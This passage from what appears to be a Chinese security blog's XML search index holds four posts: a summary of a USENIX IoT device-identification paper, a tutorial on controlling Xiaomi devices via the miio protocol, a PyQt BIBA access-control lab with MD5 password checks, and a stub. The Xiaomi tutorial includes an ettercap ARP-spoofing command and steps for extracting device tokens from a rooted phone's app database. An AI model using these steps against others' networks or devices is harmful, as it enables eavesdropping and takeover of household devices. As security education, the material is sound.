会描述设备产品。从第一个事实, 我们可以从应用层数据包获取关键词, 然后根据这些关键词依据第二个事实进行网页爬虫, 以获取网页上的相关描述, 然后对这些描述进行自然语言处理和数据挖掘, 从而建立起基于规则的映射。 核心工作—Rule Miner: Rule Miner由三个部分构成, Transaction set是一对由应用层数据和相关网页组成的文本单元, 它生成了一种规则: , 其中A是从应用层数据包中提取的一些特征, B是从相关网页抓取的设备描述; Device entity recognition结合了基于语料库的NER和基于规则的NER(命名实体识别),前者解决了设备类型和供应商名,后者使用正则表达式识别出产品型号。但是由于一个不相干的网页也可能包含设备类型的关键词(如switch), 以及一个短语可能因为满足正则表达式而被认为是型号所以表现并不好, 但好在实体与实体之间具有很高的依赖性, 这三个元素常常一起出现。数据挖掘算法Apriori algorithm用于从Transaction中学习“关系”。 完整架构和应用 完整的ARE除了核心Rule Miner之外, 还有Transaction Collection用于收集响应数据和网络爬虫, Rule Library用于存储生成的规则, Planner用于更新规则。作者主要将ARE应用于三个方面, 一是互联网范围的设备测量统计, 二是对受损设备进行检测, 三是对易受攻击的设备进行分析。之后对AR
2019-04-15 07:42:42 +00:00
<categories >
2019-04-15 07:58:23 +00:00
<category > 顶会论文</category>
2019-04-15 07:42:42 +00:00
</categories>
2019-04-15 07:58:23 +00:00
<tags >
<tag > USENIX</tag>
<tag > 数据挖掘</tag>
<tag > 自然语言处理</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[利用miio控制局域网内的小米智能设备]]> </title>
<url > %2F2018%2F12%2F15%2Fmiio-control%2F</url>
<content type= "text" > <![CDATA[控制局域网内的IOT设备中间人攻击—流量分析使用Nmap分析局域网内设备, 得到智能设备的IP 小米智能插座: 192.168.31.197 网关: 192.168.31.147( 控制它的手机ip) ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q -M ARP:remote /192.168.31.197// /192.168.31.147// wireshark抓包分析从图中可以看出, 设备的命令控制包为UDP传输, 既然是UDP协议传输, 那么是否可以通过命令包重放攻击来对设备进行控制? 了解到在homeassistant中可实现对小米设备的集成, 并在其中对设备进行管理和操作。Homeassistant, 主要以Python语言开发, 既然它能操控小米设备, 那它底层肯定有相关的函数调用库。为了可以消除对专有软件(米家app)的依赖, 并能控制自己的设备, 所以出现了MiIo。设备和米家app在同一局域网下使用的加密专有网络协议我们称之为MiIo协议。Miio库支持的设备有: 小米IOT控制流程在同一局域网中, 小米设备可以使用专有的加密UDP网络协议进行通信控制。在网络可达的前提下, 向小米设备发送hello bytes就可以获得含有token的结构体数据。之后, 构造相应的结构体, 并且以同样的方式发送给设备即可完成控制。具体流程如下: 设备Token的获取方式小米设备的token获取有三种途径: miio获取、从米家app获取、从数据库获取 miio获取在ubuntu下, 先安装miio, 然后发现设备: npminstall -g miiomiiodiscover但是很可惜, 很多设备隐藏了token, 使用该方法可能无法获取到token或获取到的token不正确。 米家app获取这种方法需要的mijia app版本较老, 且只对部分设备有效。 从数据库获取token这种方法仅在Mi Home 5.0.19之前的版本可用。该方法是读取手机中米家的app中的数据记录来获取设备的token, 具体步骤如下: 准备一部获取root权限的安卓手机 安装米家app并登录账号 进入/data/data/com.xiaomi.smarthome/databases/ 拷贝db, 下载到电脑 前往网站, 上传db, 点击提交, 即可获得token。 8894c73cbd5c7224fb4b8a39e360c255 脚本控制IOT设备首先随意发送hellobytes获得时间和设备ID, token我们自己设置; 然后构造发送的数据结构msg, cmd中的method包括: set_power(控制开关)、get_prop(获取状态), 控制的params是[‘ on’ ]/ [‘ off’ ], 获取状态的params是[‘ power’ , ‘ temperature’ ]如果获得了token, 就能对小米的设备进行操作, 如图下面是返回的信息。 总结从目前的智能家居市场来看, 用户不会只使用单个智能设备厂商的设备, 所以对于厂商来说, 通过开放接口给用户一些局域网的控制“自由”, 实现不同厂商设备的联动是一个不错的选择。从另外一个角度, 本文中体现的安全问题我们也不容忽视。如果在局域网中不经过认证就能获取物联网设备的访问凭证, 并进而进行控制, 无形中给入侵者留了一扇门。例如, 攻击者可经过扫描互联网发现家庭路由器, 并利用弱口令或设备漏洞获得路由器的shell权限, 接下来就可按照文中步骤就可以获得设备token进而控制。好在小米已经在最新的miio版本中修复了这一漏洞, 大大提高了攻击者获取token的难度。]]> </content>
2019-04-15 07:42:42 +00:00
<categories >
2019-04-15 07:58:23 +00:00
<category > IOT</category>
2019-04-15 07:42:42 +00:00
</categories>
2019-04-15 07:58:23 +00:00
<tags >
<tag > 小米</tag>
<tag > miio</tag>
<tag > 中间人</tag>
<tag > 重放攻击</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[利用python实现BIBA模型]]> </title>
<url > %2F2018%2F11%2F16%2FBIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)%2F</url>
<content type= "text" > < ![CDATA[基于python语言的BIBA模型图形界面实现实验目的: 查阅资料, 了解biba安全模型的相关知识 通过编程实现基于biba模型的完整性访问控制, 进一步掌握biba模型的规则 使用python语言实现, 熟练pyqt的图形界面设计方法 实验环境: 操作系统: Windows10 工具版本: python3.7, pyqt5 实验原理:什么是安全模型 系统的元素 具有行为能力的主体不具有行为能力的客体 系统的操作行为 可以执行的命令:读、写、执行 对系统行为的约束方式 对行为的控制策略 模型从抽象层次规定了系统行为和约束行为的方式 模型往往用状态来表示 系统行为所依赖的环境行为对系统产生的效果 biba完整性模型: 完整性威胁问题 完整性的威胁就是一个子系统在初始时刻认为不正常的修改行为;来源:内部& 外部;类型:直接& 间接 外部的直接 外部的间接 内部的直接 内部的间接 外部系统恶意地篡改另一个系统的数据或程序 一个外部系统插入恶意的子程序 修改自己的代码 修改自己的指针 biba模型的完整性定义 完整性级别高的实体对完整性低的实体具有完全的支配性,反之如果一个实体对另一个实体具有完全的控制权,说明前者完整性级别更高,这里的实体既可以是主体也可以是客体。完整性级别和可信度有密切的关系,完整级别越高,意味着可信度越高。 biba模型的规则 对于写和执行操作,有如下规则: 写规则控制当且仅当主体S的完整性级别大于或等于客体O的完整性级别时, 主体S可以写客体O,一般称之为上写。执行操作控制当且仅当主体S2的完整性级别高于或等于S1,主体S1可以执行主体S2。 关于读操作,有不同的控制策略: 低水标模型任意主体可以读任意完整性级别的客体,但是如果主体读完整性级别比自己低的客体时,主体的完整性级别将为客体完整性级别,否则,主体的完整性级别保持不变。环模型不管完整性级别如何,任何主体都可以读任何客体严格完整性模型这个模型对读操作是根据主客体的完整性级别严格控制的,即只有完整性级别低或相等的主体才可以读完整性级别高的客体,称为下读 一般都是指毕巴严格完整性模型,总结来说是上写、下读 实验内容:用户登录实现核对用户输入的账户密码与存储的是否匹配 从用户输入框获取账户和密码 检查输入信息是否合法(为空) 从password.txt中获取, 并保存在列表listFromLine中 检查输入的账户是否存在 若存在,检查对应的密码是否正确 若正确,判断是管理员还是普通用户,并跳转相应的界面 1234567891011121314151617181920212223242526272829303132333435363738394041424344def checkPass(self): nameIn = self.lineEdit.text() passwdIn = self.lineEdit_2.text() md5 = hashlib.md5() md5.update(passwdIn.encode("utf-8")) passwdIn = md5.hexdigest() if (nameIn == '') or (passwdIn == ''): QMessageBox.warning(self, "警告", "账号和密码不能为空", QMessageBox.Yes) self.lineEdit.setFocus() print(nameIn, passwdIn) fr = open('./etc/passwd.txt') arrayofLines = fr.readlines() numberofLines = len(arrayofLines) for line in arrayofLines: line = line.strip() listFromLine = line.split(':') name = listFromLine[0] if name == nameIn: numberofLines = -1 passwd = listFromLine[1] if passwd == passwdIn: group = listFromLine[2] print("\n登录成功!\n") if name == 'root': print('root登录') rootUI.show() MainWindow.close() else: urName = nameIn mainUI.lineEdit.setText(urName) mainUI.lineEdit_2.setText(group) mainUI.show() MainWindow.close() else: QMessageBox.warning(self, "警告", "密码错误!", QMessageBox.Yes) self.lineEdit.setFocus() fr.close() return 0 管理员功能实现管理员可以对用户进行增、删、查的操作 增加用户的实现 获取管理员输入的用户名、密码和用户
<categories >
<category > 理论学习</category>
</categories>
<tags >
<tag > 模型实现</tag>
<tag > python</tag>
<tag > 访问控制</tag>
</tags>
</entry>
<entry >
<title > <![CDATA[Hello World]]> </title>
<url > %2F2000%2F01%2F01%2Fhello-world%2F</url>
<content type= "text" > <![CDATA[你好!我是混元霹雳手]]> </content>
</entry>
2019-04-15 07:42:42 +00:00
</search>